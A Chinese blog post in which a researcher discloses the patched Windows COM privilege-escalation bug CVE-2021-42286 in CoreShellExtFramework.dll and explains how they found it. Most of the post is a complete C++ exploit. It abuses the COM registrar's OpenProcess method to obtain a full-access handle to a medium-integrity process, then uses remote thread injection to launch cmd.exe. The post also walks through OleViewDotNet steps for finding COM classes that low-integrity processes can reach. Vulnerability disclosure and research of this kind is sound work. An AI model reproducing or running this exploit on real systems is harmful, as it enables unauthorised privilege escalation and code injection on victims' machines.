CVE-2021-42286 利用com组件

已于 2022-04-15 10:04:27 修改
阅读量1k 收藏 2
点赞数
文章标签: windows
于 2021-11-10 21:30:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43045569/article/details/121256740
版权

说明

今天微软补了我报告的第一个漏洞,既然补丁已经发布,我完全可以披露它,同时分享我是怎么找到它的

该错误在2019年就被人报道过,但是这个错误在windows高版本被遗漏
https://www.zerodayinitiative.com/blog/2019/12/19/privilege-escalation-via-the-core-shell-com-registrar-object

挖掘过程

这是一个com组件的逻辑漏洞,在阅读了https://www.tiraniddo.dev/2018/09/后审计找到

博客中提供了两种攻击面,一种是AppContainer到medium,一种是交互式 并且教了如何查找这些接口

我想既然AppContainer到medium算漏洞,那么low到medium应该也行 再加上由于感觉com看的人比较少,索性开始试试

com相关的网址,不想被审:
在这里插入图片描述

漏洞成因

问题文件是CoreShellExtFramework.dll,加载该文件的sihost.exe以medium权限作为服务进程运行,CoreShellExtFramework.dll提供了接口CLSID_CoreShellCOMServerRegistrar,并且这个类可以被Low权限实例化
在这里插入图片描述

反编译下,问题就处在ICOMServerRegistrar上

在这里插入图片描述

ICOMServerRegistrar在ida中对应的名字为CoreShellComServerRegistrar,当时我报告的问题函数是CoreShellComServerRegistrar::OpenProcess,实际上其他方法也有问题,只不过在当时看来比较好利用
在这里插入图片描述

CoreShellComServerRegistrar::OpenProcess如下,其中的DuplicateHandle我们可以控制所有参数,并且CoreShellComServerRegistrar::OpenProcess的参数3也就是a4会被当作进程id,之后会打开这个进程,最后将句柄赋值给hSourceHandle

这将导致我们可以获得一个medium进程的句柄

在这里插入图片描述

关于漏洞利用:一旦我们获得了一个medium进程权限的句柄,那么则可以利用该句柄远程线程代码注入实现提权

exp:

#include <stdio.h>
#include <windows.h>
#include <hstring.h>
#include <cstdio>
#include <cstdlib>
#include <iostream>
#include <string>
#include <string.h>
#include <windows.h>
#include <strsafe.h>
#include <tlhelp32.h>
#define MAX_LENGTH 50
#define NORMAL_LENGTH 20
#pragma warning(disable:4996)

using namespace std;

class __declspec(uuid("e3a475cf-34ea-4e9a-9f3e-48ce5c6e4e57")) ITaskCompletionCallback : public IUnknown {
public:
    virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ INT64 p0, /* Stack Offset: 16 */ /* ENUM32 */ INT32 p1);
};

class __declspec(uuid("27eb33a5-77f9-4afe-ae05-6fdbbe720ee7")) ICOMServerRegistrar : public IUnknown {
public:
    virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ GUID* p0, /* Stack Offset: 16 */ IUnknown* p1, /* Stack Offset: 24 */ INT64* p2);
    virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ INT64 p0);
    virtual HRESULT __stdcall Proc5(/* Stack Offset: 8 */ INT64 p0, /* Stack Offset: 16 */ INT64 p1, /* Stack Offset: 24 */ INT64 p2, /* Stack Offset: 32 */ INT64* p3, /* Stack Offset: 40 */ INT64 p4, /* Stack Offset: 48 */ INT64 p5, /* Stack Offset: 56 */ INT64 p6);
    virtual HRESULT __stdcall Proc6(/* Stack Offset: 8 */ INT64 p0, /* Stack Offset: 16 */ INT64 p1, /* Stack Offset: 24 */ INT64 p2, /* Stack Offset: 32 */ INT64 p3, /* Stack Offset: 40 */ INT64* p4);
    virtual HRESULT __stdcall Proc7(/* Stack Offset: 8 */ INT64 p0, /* Stack Offset: 16 */ HSTRING* p1);
    virtual HRESULT __stdcall Proc8(/* Stack Offset: 8 */ HWND p0, /* Stack Offset: 16 */ GUID* p1, /* Stack Offset: 24 */ IUnknown** p2);
    virtual HRESULT __stdcall Proc9(/* Stack Offset: 8 */ HWND p0, /* Stack Offset: 16 */ HWND p1, /* Stack Offset: 24 */ GUID* p2, /* Stack Offset: 32 */ IUnknown** p3);
    virtual HRESULT __stdcall Proc10(/* Stack Offset: 8 */ INT64 p0, /* Stack Offset: 16 */ INT64* p1);
    virtual HRESULT __stdcall Proc11(/* Stack Offset: 8 */ INT64 p0, /* Stack Offset: 16 */ ITaskCompletionCallback* p1, /* Stack Offset: 24 */ /* ENUM32 */ INT32 p2, /* Stack Offset: 32 */ INT64* p3);
    virtual HRESULT __stdcall Proc12(/* Stack Offset: 8 */ INT64 p0);
};

ICOMServerRegistrar* pICOMServerRegistrar;

UUID clsid;

UUID iid;

typedef struct _RemoteParam
{
    CHAR szOperation[NORMAL_LENGTH];
    CHAR szAddrerss[MAX_LENGTH];
    CHAR szLb[NORMAL_LENGTH];
    CHAR szFunc[NORMAL_LENGTH];
    LPVOID dwMLAAdress;
    LPVOID dwMGPAAddress;
    LPVOID dwSEAddress;
}RemoteParam;

DWORD WINAPI ThreadProc(RemoteParam* lprp)
{
    typedef HMODULE(WINAPI* MLoadLibraryA)(IN LPCTSTR lpFileName);

    typedef FARPROC(WINAPI* MGetProcAddress)(IN HMODULE hModule, IN LPCSTR lpProcName);

    typedef HINSTANCE(WINAPI* MShellExecuteA)(HWND hwnd, LPCSTR lpOperation, LPCSTR lpFile, LPCSTR lpParameters, LPCSTR lpDirectory, INT nShowCmd);

    MLoadLibraryA MLA;

    MGetProcAddress MGPA;

    MShellExecuteA MSE;

    MLA = (MLoadLibraryA)lprp->dwMLAAdress;

    MGPA = (MGetProcAddress)lprp->dwMGPAAddress;

    lprp->dwSEAddress = (LPVOID)MGPA(MLA(lprp->szLb), lprp->szFunc);

    MSE = (MShellExecuteA)lprp->dwSEAddress;

    MSE(NULL, lprp->szOperation, lprp->szAddrerss, NULL, NULL, SW_SHOWNORMAL);

    return 0;
}


BOOL InjectProcess(HANDLE hd)
{
    HANDLE hWnd = hd;

    if (!hWnd) return FALSE;

    RemoteParam rp;

    ZeroMemory(&rp, sizeof(RemoteParam));

    rp.dwMLAAdress = (LPVOID)GetProcAddress(LoadLibraryA("Kernel32.dll"), "LoadLibraryA");

    rp.dwMGPAAddress = (LPVOID)GetProcAddress(LoadLibraryA("Kernel32.dll"), "GetProcAddress");

    StringCchCopyA(rp.szLb, sizeof(rp.szLb), "Shell32.dll");

    StringCchCopyA(rp.szFunc, sizeof(rp.szFunc), "ShellExecuteA");

    StringCchCopyA(rp.szAddrerss, sizeof(rp.szAddrerss), "cmd.exe");

    StringCchCopyA(rp.szOperation, sizeof(rp.szOperation), "open");

    RemoteParam* pRemoteParam = (RemoteParam*)VirtualAllocEx(hWnd, 0, sizeof(RemoteParam), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if (!pRemoteParam) return FALSE;

    if (!WriteProcessMemory(hWnd, pRemoteParam, &rp, sizeof(RemoteParam), 0)) return FALSE;

    LPVOID pRemoteThread = VirtualAllocEx(hWnd, 0, 1024 * 4, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if (!pRemoteThread) return FALSE;

    if (!WriteProcessMemory(hWnd, pRemoteThread, &ThreadProc, 1024 * 4, 0)) return FALSE;
    HANDLE hThread = CreateRemoteThread(hWnd, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteThread, (LPVOID)pRemoteParam, 0, NULL);

    if (!hThread) return FALSE;

    return TRUE;
}

int main(int argc, char* argv[]) {

    CoInitializeEx(NULL, COINIT_MULTITHREADED);

    CLSIDFromString(L"{54E14197-88B0-442F-B9A3-86837061E2FB}", &clsid);

    IIDFromString(L"{27eb33a5-77f9-4afe-ae05-6fdbbe720ee7}", &iid);

    HANDLE hTargetHandle = 0;

    HRESULT hr = CoCreateInstance(clsid, NULL, CLSCTX_LOCAL_SERVER, iid, (LPVOID*)&pICOMServerRegistrar);

    if (!hr)
    {
        for (size_t i = 0; i < 123456; i++)
        {
            if (!OpenProcess(PROCESS_ALL_ACCESS, FALSE, i))
            {
                pICOMServerRegistrar->Proc6(PROCESS_ALL_ACCESS,
                    FALSE,
                    i,
                    (INT64)GetCurrentProcessId(),
                    (INT64*)&hTargetHandle
                );

                if (hTargetHandle != 0)
                {
                    InjectProcess(hTargetHandle);
                    return 0;
                }
            };
        }
    }
    else
    {
        printf("CoCreateInstance Error %x ", hr);
    }

    return 0;
}

补丁后low权限将无法实例化CLSID_CoreShellCOMServerRegistrar

但是该类仍属于交互式组件,可我在进行尝试发掘时发现不能用于跨会话攻击,因为UlMgrOpenProcessHandleForAccesst里似乎有这样的代码:保证两个进程位于一个会话中

OleViewDotNet.exe查看low可以访问的appid 步骤
在这里插入图片描述

进入界面后点击Accessible然后点击Apply
在这里插入图片描述

弹出对话框设置进程访问完整性
在这里插入图片描述
点击ok,至此,过滤完毕

在这里插入图片描述

超级大水怪啦啦啦
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
[提权]Windows COM组件提权漏洞 (CVE-2017-0213)
baguangman5501的博客
09-02 777
0x01 简介 COM组件是微软开发的一种新软件开发技术,在这个COM框架的下,可以开发出多功能的组件,可以根据自己的需求进行定制开发,替换旧的组件,多个功能组件组合到一起,从而形成了一个复杂的定制化多功能系统。 0x02 影响版本 Windows10,包括1511、1607、1703这三个版本 Windows 7 SP1 Windows 8.1、RT8.1 Windows Server...
CVE-2021-25735:利用CVE-2021-25735
05-14
利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像,使用以下命令...
如何使用COM-Hunter检测持久化COM劫持漏洞
阿道夫的博客
03-01 982
1、在目标用户的计算机中查找有效的CLSID;2、通过目标用户计算机中的任务调度器(Task Scheduler)查找有效的CLSID;3、找出是否有人已经使用了这些有效的CLSID来进行持久化COM劫持(LocalServer32);4、找出是否有人通过任务调度器(TaskScheduler)使用了任何有效的CLSID来执行持久化COM劫持(LocalServer32);5、尝试通过任务调度器(Task Scheduler)自动执行持久化COM劫持;
IBM WebSphere Commons Collections组件反序列化漏洞(CVE-2015-7450)【原理扫描】
qq_35335755的博客
10-25 3831
IBM发布的Websphere安全公告: https://www.ibm.com/support/pages/security-bulletin-vulnerability-apache-commons-affects-ibm-websphere-application-server-cve-2015-7450 摘要 WebSphere Application Server和W...
COM对象劫持
最新发布
weixin_55030700的博客
03-13 1734
以下是一个示例规则,例如使用修饰符。规则会生成一些噪声,因此建议通过排除某些常见的家族(如Berbew)来进行优化。
最新完美1day,又一种新的btis服务com组件漏洞利用方式,成功提权至system
如鹿渴慕泉水的专栏
06-26 3797
分析过程: poc说明:可在未打微软2018年6月份安全补丁的win7x64,server2008r2x64运行,支持webshell模式, 支持任意用户运行,运行后获得一个system权限的cmd,提供poc源码和编译后的exe 我的poc仅供研究目的,如果读者利用本poc从事其他行为,与本人无关 前段部分介绍com组件的marshal原理有com基础的可以略过 在window...
Apache Commons Configuration远程代码执行漏洞(CVE-2022-33980)分析&复现
kjcxmx的博客
08-11 3662
Apache Commons Configuration是Apache基金会下的一个开源项目组件。它是一个java应用程序的配置管理工具,提供了一种通用的管理方式,可以从properties或者xml文件中加载软件的配置信息,用来构建支撑软件运行的基础环境。让Java开发者可以使用统一的接口读取不同类型的配置文件。...
PHP COM组件调用绕过安全模式执行任意文件漏洞
03-03
Windows平台下的PHP脚本平台存在一个安全漏洞,使得PHP设置即使在安全模式下(safe_mode),仍旧允许攻击者使用COM()函数来创建系统组件来执行任意命令。漏洞出现的原因是由于在安全模式下的PHP平台虽然system();pathru()函数被禁止,但是com。allow_dcom的设置依旧是为 true。以至于攻击者可以使用COM()函数创建系统组件对象来运行系统命令。如果是默认的Apache设置或者Web服务器以 Loacalsystem权限或Administrators权限运行,攻击者可以使用这个漏洞来提升权限。
com 组件调用不起来_堆溢出和COM漏洞寻找
weixin_39758288的博客
11-28 234
本文为看雪论坛优秀文章看雪论坛作者ID:自然dashen堆溢出>>>>案例代码#include"stdafx.h"#include#include#include#includestructtagNode{charszName[8];structtagNode*pNext;};structtagTest{shortMagic;shortnL...
com组件 的劫持_网站劫持 - ascertain - 博客园
weixin_42314399的博客
12-29 248
最近网站部分域名被劫持,刚开始以为DNS原因,经过曲折故障排查,最终确定被劫持的部分域名未使用https导致网站劫持,下为测试脚本@echo offEcho *******************************************************************************Echo Collect Machine Information…...
COM/ActiveX/OCX反编译工具 获取名称工具 IDA插件
10-16
COM/ActiveX/OCX反编译工具 测试运行正常,可以反编译com/activex方法、属性。 定位com方法的地址。
IDA_逆向中_如何识别COM组件
09-21
例如当一个API调用是由下列事项发生。 在一个应用程序或脚本使用一个API调用,如: Set objWindowsInstaller = CreateObject("WindowsInstaller.Installer") 操作系统将首先在Windows注册表的ProgID查找,然后交叉引用的ProgID及其相关的classid将在一inprocserver32值将包含路径中包含COM类实际又看DLL。
CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE
05-26
Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0和14.1.1.0.0。 容易利用的漏洞使高特权攻击者可以通过HTTP...
proxylogscan:一种快速扫描Microsoft Exchange Server上漏洞的快速工具,它使攻击者可以绕过身份验证并冒充管理员(CVE-2021-26855)
03-12
代理日志扫描 此工具用于大规模扫描Microsoft Exchange Server上的漏洞,该漏洞使攻击者可以绕过身份验证并冒充管理员(CVE-2021-26855)。 通过将此漏洞与另一个身份验证后任意文件写入漏洞链接在一起,以执行代码...
CVE-2022-22965 GUItools单个图形化利用工具
04-06
CVE-2010-1622中曾出现由于参数自动绑定机制导致的问题, 此前通过黑名单的方式修复了该漏洞,但是 JDK9之后引入了 Module,使得可以通过 getModule 绕过前者的黑名单限制,最后导致远程代码执行。
Weblogic WLS组件REC漏洞(CVE-2017-10271)利用脚本
09-30
Weblogic wls-wsat组件反序列化漏洞(CVE-2017-10271)利用脚本。 命令执行并回显 直接上传shell 在linux下weblogic 10.3.6.0测试OK 使用方法及参数 python weblogic_wls_wsat_exp.py -t 172.16.80.131:7001 usage: ...
反编译 Component重要类,全文解释 - 组件
weixin_34357928的博客
12-26 86
using System;using System.Security.Permissions;using System.Runtime.InteropServices;namespace System.ComponentModel {    /**//// &lt;summary&gt;    /// 组件类    /// &lt;/summary&gt;    [DesignerCategory...
聊聊COM组件在攻防中的作用
SHELLCODE_8BIT的博客
11-28 232
1.类似于LOLBIN,可以通过白名单的COM组件来执行程序,对于绕过EDR有效果,因为某些软件类型的COM组件由于后安装,是不在监控范围内 2.可以结合COM组件等进行CHM的钓鱼等等 3.思路也就是某些程序->可以调用COM组件的接口->执行代码或程序 ...
cve-2021-44228反弹shell不成功
09-19
CVE-2021-44228是一个Apache Log4j 2组件中的严重漏洞,被称为Log4Shell或Log4j RCE。该漏洞允许攻击者通过恶意用户输入触发远程代码执行。当成功利用该漏洞时,攻击者可以在受影响的服务器上执行任意命令,并潜在地获得对系统的完全控制。 要成功执行反弹shell攻击攻击者通常会选择将恶意命令嵌入到受攻击服务器的Log4j配置文件中。恶意命令将在服务器上被执行,从而使攻击者可以与远程恶意控制服务器建立连接,并进一步执行指令。 然而,由于几个因素,可能导致CVE-2021-44228反弹shell不成功: 1. 受攻击的服务器未及时更新修补程序:Log4Shell漏洞的修复需要用户及时更新受影响的Apache Log4j 2组件版本,并更新配置文件以避免受恶意命令执行的风险。如果服务器未更新至修补程序版本,则攻击者仍然可以利用该漏洞访问服务器,但可能会受到其他安全保护措施的限制。 2. 防火墙或安全设备过滤了恶意命令:如果目标服务器上的防火墙或其他安全设备具有适当的规则和策略,它们可能能够检测到并阻止恶意命令的执行,从而防止成功的反弹shell攻击。 3. 受攻击的服务器具有其他安全防护措施:除了及时更新Log4j组件以修复漏洞之外,许多服务器和网络通常采取其他安全措施来保护系统免受非法访问和攻击。这些安全措施可能包括基于IP、用户身份验证或其他类型的访问控制,可能会限制攻击者成功执行反弹shell攻击。 总结来说,CVE-2021-44228反弹shell不成功可能是由于受影响的服务器未及时更新修补程序、防火墙或其他安全设备过滤了恶意命令,或者服务器上具有其他安全防护措施。要解决这个问题,管理员应确保服务器已正确更新修补程序,并配置适当的安全措施来降低受到此类漏洞攻击的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值